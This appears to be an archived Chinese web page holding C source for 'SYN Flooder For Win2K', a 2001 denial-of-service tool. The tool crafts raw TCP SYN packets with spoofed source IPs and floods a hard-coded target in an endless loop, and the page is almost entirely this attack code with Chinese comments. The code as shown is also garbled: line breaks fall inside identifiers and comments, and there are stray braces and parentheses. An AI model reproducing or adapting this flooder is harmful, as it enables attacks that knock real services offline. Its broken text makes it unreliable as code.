📄 359.htm
字号:
编译环境:VC++6.0,编译时需要包含ws2_32.lib <br>
////////////////////////////////////////////////////////////////////////// <br>
// // <br>
// SYN Flooder For Win2K by Shotgun // <br>
// // <br>
// THIS PROGRAM IS MODIFIED FROM A LINUX VERSION BY Zakath // <br>
// THANX Lion Hook FOR PROGRAM OPTIMIZATION // <br>
// // <br>
// Released: [2001.4] // <br>
// Author: [Shotgun] // <br>
// Homepage: // <br>
// [http://IT.Xici.Net] // <br>
// [http://WWW.Patching.Net] // <br>
// // <br>
////////////////////////////////////////////////////////////////////////// <br>
#include <winsock2.h> <br>
#include <Ws2tcpip.h> <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#define SEQ 0x28376839 <br>
#define SYN_DEST_IP "192.168.15.250"//被攻击的IP <br>
#define FAKE_IP "10.168.150.1" //伪装IP的起始值,本程序的伪装IP覆盖一个 <br>
B类 <br>
网段 <br>
#define STATUS_FAILED 0xFFFF //错误返回值 <br>
typedef struct _iphdr //定义IP首部 <br>
{ <br>
unsigned char h_verlen; //4位首部长度,4位IP版本号 <br>
unsigned char tos; //8位服务类型TOS <br>
unsigned short total_len; //16位总长度(字节) <br>
unsigned short ident; //16位标识 <br>
unsigned short frag_and_flags; //3位标志位 <br>
unsigned char ttl; //8位生存时间 TTL <br>
unsigned char proto; //8位协议 (TCP, UDP 或其他) <br>
unsigned short checksum; //16位IP首部校验和 <br>
unsigned int sourceIP; //32位源IP地址 <br>
unsigned int destIP; //32位目的IP地址 <br>
}IP_HEADER; <br>
struct //定义TCP伪首部 <br>
{ <br>
unsigned long saddr; //源地址 <br>
unsigned long daddr; //目的地址 <br>
char mbz; <br>
char ptcl; //协议类型 <br>
unsigned short tcpl; //TCP长度 <br>
}psd_header; <br>
typedef struct _tcphdr //定义TCP首部 <br>
{ <br>
USHORT th_sport; //16位源端口 <br>
USHORT th_dport; //16位目的端口 <br>
unsigned int th_seq; //32位序列号 <br>
unsigned int th_ack; //32位确认号 <br>
unsigned char th_lenres; //4位首部长度/6位保留字 <br>
unsigned char th_flag; //6位标志位 <br>
USHORT th_win; //16位窗口大小 <br>
USHORT th_sum; //16位校验和 <br>
USHORT th_urp; //16位紧急数据偏移量 <br>
}TCP_HEADER; <br>
//CheckSum:计算校验和的子函数 <br>
USHORT checksum(USHORT *buffer, int size) <br>
{ <br>
unsigned long cksum=0; <br>
while(size >1) { <br>
cksum+=*buffer++; <br>
size -=sizeof(USHORT); <br>
} <br>
if(size ) { <br>
cksum += *(UCHAR*)buffer; <br>
} <br>
cksum = (cksum >> 16) + (cksum & 0xffff); <br>
cksum += (cksum >>16); <br>
return (USHORT)(~cksum); <br>
} <br>
// SynFlood主函数 <br>
int main() <br>
{ <br>
int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost; <br>
int TimeOut=2000,SendSEQ=0; <br>
char SendBuf[128]={0}; <br>
char RecvBuf[65535]={0}; <br>
WSADATA wsaData; <br>
SOCKET SockRaw=(SOCKET)NULL; <br>
struct sockaddr_in DestAddr; <br>
IP_HEADER ip_header; <br>
TCP_HEADER tcp_header; <br>
//初始化SOCK_RAW <br>
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){ <br>
fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode); <br>
ExitProcess(STATUS_FAILED); <br>
} <br>
SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPE <br>
D)); <br>
if (SockRaw==INVALID_SOCKET){ <br>
fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError()); <br>
ExitProcess(STATUS_FAILED); <br>
} <br>
} <br>
flag=TRUE; <br>
//设置IP_HDRINCL以自己填充IP首部 <br>
ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof( <br>
int) <br>
); <br>
If (ErrorCode==SOCKET_ERROR) printf("Set IP_HDRINCL Error!\n"); <br>
__try{ <br>
//设置发送超时 <br>
ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut, <br>
size <br>
of(TimeOut)); <br>
if(ErrorCode==SOCKET_ERROR){ <br>
fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastErro <br>
r()) <br>
; <br>
__leave; <br>
} <br>
memset(&DestAddr,0,sizeof(DestAddr)); <br>
DestAddr.sin_family=AF_INET; <br>
DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP); <br>
FakeIpNet=inet_addr(FAKE_IP); <br>
FakeIpHost=ntohl(FakeIpNet); <br>
//填充IP首部 <br>
ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); <br>
<br>
//高四位IP版本号,低四位首部长度 <br>
ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); <br>
//1 <br>
6位总长度(字节) <br>
ip_header.ident=1; <br>
//16位标识 <br>
ip_header.frag_and_flags=0; <br>
//3位标志位 <br>
ip_header.ttl=128; <br>
//8位生存时间TTL <br>
ip_header.proto=IPPROTO_TCP; <br>
// <br>
8位协议(TCP,UDP…) <br>
ip_header.checksum=0; <br>
//16位IP首部校验和 <br>
ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); <br>
/ <br>
/32位源IP地址 <br>
ip_header.destIP=inet_addr(SYN_DEST_IP); <br>
/ <br>
/32位目的IP地址 <br>
//填充TCP首部 <br>
tcp_header.th_sport=htons(7000); <br>
// <br>
源端口号 <br>
tcp_header.th_dport=htons(8080); <br>
// <br>
目的端口号 <br>
tcp_header.th_seq=htonl(SEQ+SendSEQ); <br>
/ <br>
/SYN序列号 <br>
tcp_header.th_ack=0; <br>
//A <br>
CK序列号置为0 <br>
tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); <br>
//TCP长度和保留位 <br>
tcp_header.th_flag=2; <br>
//SYN 标志 <br>
tcp_header.th_win=htons(16384); <br>
//窗口大小 <br>
tcp_header.th_urp=0; <br>
// <br>
偏 <br>
移 <br>
tcp_header.th_sum=0; <br>
// <br>
校 <br>
验和 <br>
//填充TCP伪首部(用于计算校验和,并不真正发送) <br>
psd_header.saddr=ip_header.sourceIP; <br>
//源地址 <br>
psd_header.daddr=ip_header.destIP; <br>
//目的地址 <br>
psd_header.mbz=0; <br>
psd_header.ptcl=IPPROTO_TCP; <br>
//协议类型 <br>
psd_header.tcpl=htons(sizeof(tcp_header)); <br>
//TCP首部长度 <br>
while(1) { <br>
//每发送10,240个报文输出一个标示符 <br>
printf("."); <br>
for(counter=0;counter<10240;counter++){ <br>
if(SendSEQ++==65536) SendSEQ=1; <br>
//序列号循环 <br>
//更改IP首部 <br>
ip_header.checksum=0; <br>
//16位IP首部校验和 <br>
ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); <br>
/ <br>
/32位源IP地址 <br>
//更改TCP首部 <br>
tcp_header.th_seq=htonl(SEQ+SendSEQ); <br>
/ <br>
/SYN序列号 <br>
tcp_header.th_sum=0; <br>
// <br>
校 <br>
验和 <br>
//更改TCP Pseudo Header <br>
psd_header.saddr=ip_header.sourceIP; <br>
//计算TCP校验和,计算校验和时需要包括TCP pseudo header <br>
memcpy(SendBuf,&psd_header,sizeof(psd_header)); <br>
memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_hea <br>
der) <br>
); <br>
); <br>
tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_head <br>
er)+ <br>
sizeof(tcp_header)); <br>
//计算IP校验和 <br>
memcpy(SendBuf,&ip_header,sizeof(ip_header)); <br>
memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_head <br>
er)) <br>
; <br>
memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4); <br>
datasize=sizeof(ip_header)+sizeof(tcp_header); <br>
ip_header.checksum=checksum((USHORT *)SendBuf,datasize); <br>
//填充发送缓冲区 <br>
memcpy(SendBuf,&ip_header,sizeof(ip_header)); <br>
//发送TCP报文 <br>
ErrorCode=sendto(SockRaw, <br>
SendBuf, <br>
datasize, <br>
0, <br>
(struct sockaddr*) &DestAddr, <br>
sizeof(DestAddr)); <br>
if (ErrorCode==SOCKET_ERROR) printf("\nSend Error:%d\n",GetLastError()); <br>
}//End of for <br>
}//End of While <br>
}//End of try <br>
__finally { <br>
if (SockRaw != INVALID_SOCKET) closesocket(SockRaw); <br>
WSACleanup(); <br>
} <br>
return 0; <br>
} <br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="343.htm">上一层</a>][<a href="360.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -